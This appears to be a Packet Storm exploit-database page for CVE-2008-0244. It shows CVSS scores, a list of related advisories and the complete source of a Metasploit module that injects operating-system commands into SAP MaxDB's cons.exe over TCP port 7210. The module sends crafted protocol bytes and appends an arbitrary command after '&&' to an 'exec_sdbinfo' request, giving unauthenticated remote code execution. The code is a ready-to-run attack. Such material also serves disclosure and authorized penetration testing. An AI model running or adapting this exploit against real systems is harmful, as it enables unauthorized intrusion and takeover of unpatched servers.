Lucene search
Jay Turla, metasploit.comPACKETSTORM:180751HistoryAug 31, 2024 - 12:00 a.m.
SAP MaxDB Cons.exe Remote Command Injection
2024-08-3100:00:00
Jay Turla, metasploit.com
packetstormsecurity.com
14
sap maxdb
command injection
remote vulnerability
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
AI Score
7
Confidence
Low
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'SAP MaxDB cons.exe Remote Command Injection',
'Description' => %q{
SAP MaxDB is prone to a remote command-injection vulnerability
because the application fails to properly sanitize user-supplied input.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '40210' ],
['BID', '27206'],
['CVE', '2008-0244'],
],
'DisclosureDate' => '2008-01-09'))
register_options(
[
Opt::RPORT(7210),
OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']),
])
end
def run
connect
# Grab the MaxDB info.
pdbmsrv = "\x5A\x00\x00\x00\x03\x5B\x00\x00\x01\x00\x00\x00\xFF\xFF\xFF\xFF"
pdbmsrv << "\x00\x00\x04\x00\x5A\x00\x00\x00\x00\x02\x42\x00\x04\x09\x00\x00"
pdbmsrv << "\x00\x40\x00\x00\xD0\x3F\x00\x00\x00\x40\x00\x00\x70\x00\x00\x00"
pdbmsrv << "\x00\x07\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00"
pdbmsrv << "\x07\x49\x33\x34\x33\x32\x00\x04\x50\x1C\x2A\x03\x52\x01\x03\x72"
pdbmsrv << "\x01\x09\x70\x64\x62\x6D\x73\x72\x76\x00"
db_version = "\x28\x00\x00\x00\x03\x3f\x00\x00\x01\x00\x00\x00\xc0\x0b\x00\x00"
db_version << "\x00\x00\x04\x00\x28\x00\x00\x00\x64\x62\x6d\x5f\x76\x65\x72\x73"
db_version << "\x69\x6f\x6e\x20\x20\x20\x20\x20"
sock.put(pdbmsrv)
sock.get_once
sock.put(db_version)
ver = sock.get_once || ''
info = ver[27,2000]
if (info.length > 0)
print_status(info)
end
# Send our command.
len = 39 + datastore['CMD'].length
data = len.chr + "\x00\x00\x00\x03\x3F\x00\x00\x01\x00\x00\x00\x54\x0D\x00\x00"
data << "\x00\x00\x04\x00" + len.chr + "\x00\x00\x00\x65\x78\x65\x63\x5F\x73\x64"
data << "\x62\x69\x6E\x66\x6F\x20\x26\x26" + "#{datastore['CMD']}"
sock.put(data)
res = sock.get_once
print_line(res)
disconnect
end
end
`
Related
prion
prion
Command injection
2008-01-12 02:46:00
cvelist
cvelist
CVE-2008-0244
2008-01-12 02:00:00
saint
saint
MySQL MaxDB cons.exe command injection
2008-01-16 00:00:00
MySQL MaxDB cons.exe command injection
2008-01-16 00:00:00
MySQL MaxDB cons.exe command injection
2008-01-16 00:00:00
exploitdb
exploitdb
SAP MaxDB 7.6.03.07 - Remote Command Execution
2008-01-09 00:00:00
nvd
nvd
CVE-2008-0244
2008-01-12 02:46:00
d2
d2
DSquare Exploit Pack: D2SEC_MAXDB
2008-01-12 02:46:00
ubuntucve
ubuntucve
CVE-2008-0244
2008-01-12 00:00:00
cve
cve
CVE-2008-0244
2008-01-12 02:46:00
nessus
nessus
SAP DB / MaxDB Cons Program Arbitrary Command Execution
2008-01-11 00:00:00
SAP MaxDB Multiple Vulnerabilities
2008-05-09 00:00:00
checkpoint_advisories
checkpoint_advisories
SAP MaxDB Remote Arbitrary Commands Execution (CVE-2008-0244)
2009-10-29 00:00:00
metasploit
metasploit
SAP MaxDB cons.exe Remote Command Injection
2008-01-20 22:52:05
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
AI Score
7
Confidence
Low
Related for PACKETSTORM:180751